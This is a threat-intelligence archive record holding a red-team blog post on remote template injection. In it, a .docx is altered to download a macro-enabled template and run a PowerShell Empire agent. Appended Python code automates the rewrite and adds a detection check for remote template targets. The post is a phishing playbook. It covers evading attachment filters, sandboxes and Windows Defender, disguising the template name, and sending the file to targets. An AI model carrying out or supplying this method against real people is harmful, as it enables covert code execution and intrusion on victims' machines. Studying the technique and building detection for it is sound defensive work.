{
	"id": "75e97b42-1db9-4885-b551-08af73028f87",
	"created_at": "2026-04-06T00:08:27.275378Z",
	"updated_at": "2026-04-10T03:22:12.650224Z",
	"deleted_at": null,
	"sha1_hash": "5f8aba2fbdd566b06db76aedd6da6bcb6e792757",
	"title": "Executing Macros From a DOCX With Remote Template Injection",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 732231,
	"plain_text": "Executing Macros From a DOCX With Remote Template Injection\r\nBy BinaryFaultline\r\nPublished: 2018-07-19 · Archived: 2026-04-05 20:30:33 UTC\r\nThe What:\r\nIn this post, I want to talk about and show off a code execution method which was shown to me a little while back. This method allows one to create a DOCX document which loads a remote DOTM template file and lets the user execute the macros that template contains. This attack has been seen in the wild, is partially included in open-source offensive security tools, and has been blogged about by Cisco Talos, but in that blog post and in the open-source tool it is only used as a credential-stealing attack, typically over the SMB protocol. This blog post details how to use the same method to download a macro-enabled template over HTTP(S), in a proxy-aware manner, into a DOCX document.\r\nThe Why:\r\nThe benefit of this attack versus a traditional macro-enabled document is multidimensional. When executing a phishing attack against a target, you are able to attach the .docx directly to the email and are very unlikely to get blocked based on the file extension. Many organizations block .doc or .docm but allow .docx because .docx files are not supposed to be able to contain macros.\r\nAnother reason this attack will likely land more often is that the attachment itself does not contain malicious code. The macro is never seen by static email scanners, so the attachment is less likely to be blocked. In the event that your target uses a sandbox to detonate email attachments, you can use sandbox evasion techniques such as mod_rewrite rules or IP limiting to prevent the sandbox from pulling down the malicious template. @bluescreenofjeff has a wonderful guide on creating mod_rewrite rules for this type of evasion in his Red Team Infrastructure Wiki.\r\nThe How:\r\nTo start this attack, we need to create two different files. The first will be the macro-enabled template, or .dotm file, which contains the malicious VBA macro. The second will be the seemingly benign .docx file, which contains no malicious code itself, only a relationship whose target points at your malicious template file.\r\nGetting Started:\r\nIn my blog posts and trainings that I provide to others, I aim to show examples using free and open-source tools. I do this because I want anyone reading this blog to be able to try it on their own (always against their own systems or systems which they have permission to test) and do not want to force people into purchasing commercial tools. For this reason, I will walk through the steps for creating the remote template document to execute a\r\nhttp://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html\r\nPage 1 of 8\n\nPowerShell Empire payload. To keep to the purpose of this post, I won’t detail how to create the listener or the macro for Empire here. There are many tutorials on how to do this already. I will just walk through creating the documents that execute the macro.\r\nCreating the Macro-Enabled Template:\r\nFor this attack to work, we need to create a macro-enabled Word template (.dotm file extension) which contains our malicious Empire macro. Open up Word and make the Developer tab on the ribbon visible. Then open the Visual Basic editor from the Developer tab and double-click ThisDocument under the current project to open the code window. Paste your macro code into this window.\r\nGive the template a name and save the file in the .dotm format. Please note that the name is usually briefly visible to the user, so I recommend something seemingly benign such as ‘InvoiceTemplate.dotm’.\r\nSince I am just using the default macro from PowerShell Empire, it is quickly picked up by Windows Defender, so I am going to disable Defender for the demo. If your target uses Windows Defender, you will need to pick a different tool or obfuscate the macro until you have one that works.\r\nAt this point, I like to validate the template and macro by double-clicking the document and making sure that I get the ‘Enable Content’ button and that I get an agent when I click it. It works!\r\nCreating the Remote-Template-Loading Document:\r\nWith the template working, we now need to create a .docx file that will download and load the template from a remote resource. The easiest way I have found to do this is to create a .docx document from one of the templates that ship with Word, then modify the target of its attached-template relationship.\r\nModify the document as necessary to fit your phishing scenario, so that the target user will click the ‘Enable Content’ button if it appears for them. Save the document in the .docx format.\r\nNext, find the document, right-click it, and rename the extension from .docx to .zip. Extract the contents of the zip file to a folder and browse to that folder.\r\nNote: With the release of Office 2007, Microsoft introduced the formats whose extensions end in an ‘x’ character. Each of these formats is just a zip file (an Office Open XML package) containing mostly .xml and .rels files. You can manually edit the document and its properties by changing these files and then re-zipping the contents.\r\nNavigate to the ‘.\\word\\_rels\\’ folder and open the ‘settings.xml.rels’ file using a text editor such as Notepad. The Relationship element whose Type ends in attachedTemplate is the setting that tells Word where to load your template from when you open that .docx; the w:attachedTemplate element in word\\settings.xml refers to it by its Id. Currently, it is loading a template from the local file system.\r\nThe key is that this Target value accepts web URLs. We can modify the Target value to be a remote location, keeping TargetMode=\"External\" on the relationship. In this case, I host my macro-enabled template on GitHub.\r\nOnce we save this file, we can zip the contents back up and rename the file back to a .docx. Zip the extracted files themselves rather than the folder that contains them, so that [Content_Types].xml stays at the root of the archive; otherwise Word will refuse to open the result. The next time we open our .docx, we can see that Word reaches out over HTTPS to our hosting service to download the template. And now our .docx file has a macro loaded into it and is allowed to run macros.\r\nThere is a new pop-up to the user, but it does not affect the payload. This is just due to the fact that .docx files are not intended to contain macros. If the user clicks ‘Enable Content’ or has macros set to run automatically, then we get our agents.\r\nNow prep your phishing email, send the .docx to the user, and wait for the call backs!\r\nSource: http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html"
	],
	"report_names": [
		"executing-macros-from-docx-with-remote.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434107,
	"ts_updated_at": 1775791332,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5f8aba2fbdd566b06db76aedd6da6bcb6e792757.pdf",
		"text": "https://archive.orkl.eu/5f8aba2fbdd566b06db76aedd6da6bcb6e792757.txt",
		"img": "https://archive.orkl.eu/5f8aba2fbdd566b06db76aedd6da6bcb6e792757.jpg"
	}
}
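The relationship rewrite described in the ‘Creating the Remote-Template-Loading Document’ section of the post, done programmatically instead of in Notepad, together with the check a defender would run on an inbound .docx. This is an added example and not code from the original post or its author; it uses only the Python standard library. The package it builds is a constructed sample holding only word/settings.xml and its relationships part (not a complete, Word-openable document), and https://example.com/InvoiceTemplate.dotm is a placeholder URL.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_RELS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"

# Keep the package-relationships namespace as the default (xmlns="...") when
# ElementTree re-serialises the part, instead of an ns0: prefix.
ET.register_namespace("", PKG_RELS)


def build_sample_docx(local_template="file:///C:/Users/user/AppData/Roaming/"
                                     "Microsoft/Templates/Invoice.dotx"):
    """Constructed sample: the two parts the technique touches, written the way
    Word writes them for a document created from a local template."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
        f'<Relationships xmlns="{PKG_RELS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{local_template}" TargetMode="External"/>'
        "</Relationships>"
    )
    settings = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<w:attachedTemplate r:id="rId1"/></w:settings>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")  # placeholder, kept first as in a real package
        z.writestr("word/settings.xml", settings)
        z.writestr(SETTINGS_RELS, settings_rels)
    return buf.getvalue()


def attached_template_target(docx_bytes):
    """Return the Target of the attachedTemplate relationship, or None if absent."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if SETTINGS_RELS not in z.namelist():
            return None
        root = ET.fromstring(z.read(SETTINGS_RELS))
    for rel in root.iter(f"{{{PKG_RELS}}}Relationship"):
        if rel.get("Type") == ATTACHED_TEMPLATE:
            return rel.get("Target")
    return None


def set_attached_template(docx_bytes, target):
    """Return a copy of the package whose attached template is fetched from `target`."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zin:
        root = ET.fromstring(zin.read(SETTINGS_RELS))
        rels = [r for r in root.iter(f"{{{PKG_RELS}}}Relationship")
                if r.get("Type") == ATTACHED_TEMPLATE]
        if not rels:
            raise ValueError("no attachedTemplate relationship: create the .docx "
                             "from a Word template first so that one exists")
        rels[0].set("Target", target)          # ElementTree escapes &, <, " for us
        rels[0].set("TargetMode", "External")  # Word resolves the Target as a URI
        new_rels = ET.tostring(root, encoding="utf-8", xml_declaration=True)
        out = io.BytesIO()
        with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zout:
            # Copy every member in its original order so [Content_Types].xml
            # stays first, swapping in only the rewritten relationships part.
            for info in zin.infolist():
                data = new_rels if info.filename == SETTINGS_RELS else zin.read(info.filename)
                zout.writestr(info.filename, data)
    return out.getvalue()


def is_remote_template(target):
    """Detection heuristic for an inbound .docx: the attached template is pulled
    over the network (HTTP(S) as in this post, or a UNC path as in the SMB
    credential-theft variant) rather than from the local disk."""
    if not target:
        return False
    t = target.strip().lower()
    return t.startswith(("http://", "https://", "\\\\", "//"))


if __name__ == "__main__":
    benign = build_sample_docx()
    armed = set_attached_template(benign, "https://example.com/InvoiceTemplate.dotm")
    for name, pkg in (("original", benign), ("rewritten", armed)):
        tgt = attached_template_target(pkg)
        print(f"{name}: {tgt} remote={is_remote_template(tgt)}")
```

For a real document, read the .docx produced by Word into `set_attached_template` and write the returned bytes back out; the rest of the package is copied untouched, which is why the file still looks like an ordinary .docx to extension- and signature-based filters. On the defensive side, `attached_template_target` plus `is_remote_template` is the whole check a mail gateway needs to flag this technique, since the remote target has to be present in the package before Word ever fetches it.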